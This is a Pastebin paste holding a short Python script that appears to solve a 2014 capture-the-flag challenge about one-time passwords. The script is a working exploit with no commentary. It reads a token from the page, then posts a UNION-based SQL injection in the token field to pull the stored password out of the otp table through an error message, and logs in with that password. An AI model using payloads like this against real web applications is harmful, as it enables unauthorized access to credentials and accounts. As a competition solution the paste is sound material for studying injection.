Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests,re
- #razor4x - tasteless
- r=requests.get("http://otp.adctf2014.katsudon.org/")
- reg=re.search('name="token" value="(.+?)"',r.text)
- token=reg.group(1)
- r=requests.post("http://otp.adctf2014.katsudon.org/",data={'token':"' and 1=0 union select pwd from (select 1 token,2 pwd,3 expire from otp where 1=0 union select * from otp) where token='"+token+"'-- -",'pass':''})
- reg=re.search('otp expired at (.+?)</p>',r.text)
- pw=reg.group(1)
- r=requests.post("http://otp.adctf2014.katsudon.org/",data={'token':token,'pass':pw})
- print r.text
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
